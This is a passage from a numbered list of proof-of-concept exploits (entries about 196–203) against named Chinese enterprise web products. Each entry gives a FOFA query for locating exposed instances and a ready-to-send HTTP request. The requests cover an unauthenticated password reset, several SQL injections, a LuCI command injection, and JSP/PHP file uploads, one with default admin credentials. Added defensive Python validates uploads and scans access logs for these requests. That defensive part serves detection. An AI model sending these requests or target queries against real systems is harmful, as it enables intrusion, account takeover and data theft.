{"xgh":"test","newPass":"test666","email":""}

Note: resetPasswordBySuper sets newPass for the account identified by xgh, and the published request carries no session at all. Do not run this against a real account name; test with a non-existent xgh on production, or with a throwaway account on a lab instance.

197. 浙大恩特客户资源管理系统 (customer resource management system): Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

Note: union-based injection in goonumStr; look for 12321 (111*111) in the response. Keep the ;.js suffix on the path, it is part of the published request.

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app): command injection
CVE-2024-29640

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

Note: sid decodes to `ls />/www/aaa.txt` followed by a space; the backticks make the shell substitute the command, and the listing is written to /www/aaa.txt, which on OpenWrt is the uhttpd document root and therefore readable at /aaa.txt. The request requires a valid LuCI sysauth session cookie; the value above is a placeholder.

199. Cockpit CMS: assetsmanager/upload file upload
FOFA: title="Authenticate Please!"

Step 1: fetch the login page to obtain the csfr token embedded in it.

GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response: 200; the page contains a value of the form csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw" (the token is per-instance; the value shown is the one from the published PoC).

Step 2: authenticate with that token to obtain a session cookie. The PoC uses the default admin/admin credentials; without working credentials this step fails and the upload is not reachable.

POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200 with Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3: upload a PHP file through the assets manager using that cookie.

POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The file is then reachable at /storage/uploads/tttt.php; the PoC script removes itself (unlink(__FILE__)) on its first execution.

200. SeaCMS 海洋影视管理系统: dmku SQL injection
FOFA: app="海洋CMS"

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

Note: time-based blind injection against MySQL (sleep(5)) in the id parameter of the ac=del action; a ~5 s delay confirms. The PHPSESSID shown is arbitrary.

201. 方正全媒体新闻采编系统 (Founder omni-media news editing system): binary SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

Note: TableName is concatenated into the query. Decoded, the value is DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH, a stacked query against SQL Server; a ~5 s delay confirms.

202. 微擎系统: AccountEdit arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"

Step 1: GET the page to obtain the current __VIEWSTATE and __EVENTVALIDATION values.

GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2: submit the form with the two values from Step 1 substituted for the __VIEWSTATE and __EVENTVALIDATION placeholders.

POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is stored under its original name at /_data/Uploads/1123.txt. The bttnUpload value 上传图片 ("upload image") is the button caption and must be sent as-is. The published PoC uploads a .txt; it does not demonstrate an executable extension.

203. 红海云EHR (Redsea eHR): PtFjk file upload
FOFA: body="RedseaPlatform"

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

Note: the declared image/jpeg part Content-Type does not restrict the extension; the .jsp is stored as uploaded. The published PoC does not state the stored path.
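Entries 192, 194, 199, 202 and 203 fail for one of three reasons: the extension is taken from a client-controlled value (the name query parameter in 192), the filename is used as a path (the ../ chain in 194), or the client's declared Content-Type is trusted instead of the file itself (image/jpeg over a JSP in 203). The Python below is an added example of the server-side validation that closes all three at once; it is not code from any of these vendors, and the allowlist and magic bytes are choices for the example, not values from any product.

```python
import re
import secrets
from typing import Optional

# Extension allowlist paired with the leading bytes a genuine file of that type
# carries. Anything not listed (jsp, ashx, php, ...) is rejected by default.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# Server-side script extensions that must not appear between the base name and
# the final extension, so "shell.php.jpg" is refused even though .jpg is allowed.
SCRIPT_EXTS = {"jsp", "jspx", "asp", "aspx", "ashx", "asmx", "php", "phtml", "cgi", "war"}


def sanitize_filename(raw: str) -> str:
    """Keep only the last path component and a conservative character set.
    Entry 194's '../../../../../jboss/web/fe.war/hello.jsp' becomes 'hello.jsp'
    (which then fails the extension check); the traversal itself is gone.
    Leading dots are stripped, so entry 192's '.ashx' has no extension at all."""
    last = raw.replace("\\", "/").rsplit("/", 1)[-1]
    last = re.sub(r"[^A-Za-z0-9._-]", "_", last)
    return last.lstrip(".")


def validate_upload(filename: str, declared_type: str, content: bytes,
                    token: Optional[str] = None):
    """Return (accepted, stored_name, reason).

    `declared_type` is the client's Content-Type. It is taken as an argument only
    to make the point: it is never consulted, because entry 203 sends a JSP body
    under image/jpeg. Only the extension allowlist and the file's own leading
    bytes decide, and the stored name is generated server-side.
    """
    name = sanitize_filename(filename)
    if "." not in name:
        return False, "", "no usable filename or extension"
    parts = name.lower().split(".")
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        return False, "", f"extension .{ext} is not on the allowlist"
    if any(p in SCRIPT_EXTS for p in parts[1:-1]):
        return False, "", "script extension hidden inside the name"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "", f"content does not start like a .{ext} file (declared {declared_type} ignored)"
    # Never reuse the client's name on disk: a random name removes any remaining
    # ambiguity (semicolons, NULs, double extensions) and is not guessable.
    stored = f"{token or secrets.token_hex(8)}.{ext}"
    return True, stored, "ok"


if __name__ == "__main__":
    # The PoC file parts from entries 192, 194 and 203, plus a genuine JPEG header.
    probes = [
        (".ashx", "application/x-www-form-urlencoded", b'<%@ WebHandler Language="C#" Class="AverageHandler" %>'),
        ("../../../../../jboss/web/fe.war/hello.jsp", "text/plain", b'<% out.println("hello");%>'),
        ("11.jsp", "image/jpeg", b'<% out.print("hello,eHR");%>'),
        ("holiday.JPG", "application/octet-stream", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ]
    for fname, ctype, body in probes:
        print(f"{fname:45} -> {validate_upload(fname, ctype, body)}")
```

The magic-byte check is a sanity filter, not a guarantee (polyglot files exist); the controls that actually hold are the allowlist, the server-generated name, and storing uploads in a directory where the web server does not execute scripts.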
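The stated purpose of this list is to let defenders check for risk, and most of the PoCs above leave a distinctive request line in an ordinary web access log. The Python below is an added example, not part of the original list, that scans Combined Log Format lines for the endpoints of entries 188 to 203 and for the payload fragments several of them share; the sample log lines are constructed for the example and are not real traffic.

```python
import posixpath
import re
from urllib.parse import unquote

# Combined Log Format: client, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Endpoint indicators from entries 188-203 above: (rule, method or None, path regex).
# Paths are percent-decoded and normalised first, so the /js/../ trick in
# entry 191 still lands on /CDGServer3/NavigationAjax. Entry 202's page is
# normal GET traffic, so only the POST that carries the upload is flagged.
ENDPOINT_RULES = [
    ("188 attachment file read", None, r"^/attachment$"),
    ("189 deleteStudy SQLi", None, r"^/xds/deleteStudy\.php$"),
    ("190 poihuoqu file read", "POST", r"^/index\.php/admin/Userinfo/poihuoqu$"),
    ("191 NavigationAjax SQLi", "POST", r"^/CDGServer3/NavigationAjax$"),
    ("192 UploadEmailAttr upload", "POST", r"^/JoinfApp/EMail/UploadEmailAttr$"),
    ("193 setSystemTimeAction RCE", "POST", r"^/master/ajaxActions/setSystemTimeAction\.php$"),
    ("194 uploadAttachmentServlet upload", None, r"^/servlet/uploadAttachmentServlet$"),
    ("195 send_order.cgi RCE", "POST", r"^/send_order\.cgi$"),
    ("196 resetPasswordBySuper", "POST", r"^/cas/userCtl/resetPasswordBySuper$"),
    ("197 Quotegask_editAction SQLi", None, r"^/entsoft/Quotegask_editAction\.entweb"),
    ("198 aliyundrive-webdav query", None, r"/aliyundrive-webdav/query$"),
    ("199 cockpit assetsmanager upload", "POST", r"^/assetsmanager/upload$"),
    ("200 SeaCMS dmku SQLi", None, r"/dmplayer/dmku$"),
    ("201 binary.do SQLi", "POST", r"^/newsedit/newsplan/task/binary\.do$"),
    ("202 AccountEdit.aspx upload", "POST", r"^/User/AccountEdit\.aspx$"),
    ("203 PtFjk.mob upload", "POST", r"^/RedseaPlatform/PtFjk\.mob$"),
]

# Payload fragments that several PoCs above share, matched on the decoded query.
# POST bodies (entries 190, 191, 195, 201) never reach an access log, so those
# are caught by the endpoint rule only; full-request logging or a WAF is needed
# to see the body.
PAYLOAD_RULES = [
    ("time-based SQLi", r"waitfor\s+delay|\bsleep\s*\("),
    ("local file read", r"/etc/passwd|\bfile:/"),
    ("command substitution", r"`|\$\("),
]


def classify(method: str, target: str) -> list:
    """Return the names of every rule that fires for one request line."""
    raw_path, _, raw_query = target.partition("?")
    path = posixpath.normpath(unquote(raw_path))
    query = unquote(raw_query)
    hits = [name for name, m, rx in ENDPOINT_RULES
            if (m is None or m == method) and re.search(rx, path)]
    hits += [name for name, rx in PAYLOAD_RULES if re.search(rx, query, re.IGNORECASE)]
    return hits


def scan_log(text: str) -> list:
    """Scan access-log text; one finding per line that trips at least one rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        hits = classify(method, target)
        if hits:
            findings.append({"line": lineno, "client": client,
                             "status": int(status), "rules": hits})
    return findings


# Constructed sample log (not real traffic): six PoC replays and one benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2024:10:01:02 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1823 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jun/2024:10:01:07 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jun/2024:10:02:00 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60ls%60 HTTP/1.1" 200 12 "-" "curl/8.0"
198.51.100.7 - - [10/Jun/2024:10:02:30 +0800] "POST /servlet/uploadAttachmentServlet HTTP/1.1" 200 56 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jun/2024:10:03:00 +0800] "GET /index.php/admin/Userinfo/list HTTP/1.1" 200 4412 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jun/2024:10:03:05 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 2 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jun/2024:10:03:10 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 2 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:>2} {f['client']:<14} {f['status']} {', '.join(f['rules'])}")
```

Treat an endpoint hit with a 200 as the priority: a 404 on these paths usually means the product is not installed, while a 200 on a path such as /servlet/uploadAttachmentServlet or /assetsmanager/upload is exactly the exposure the corresponding entry describes.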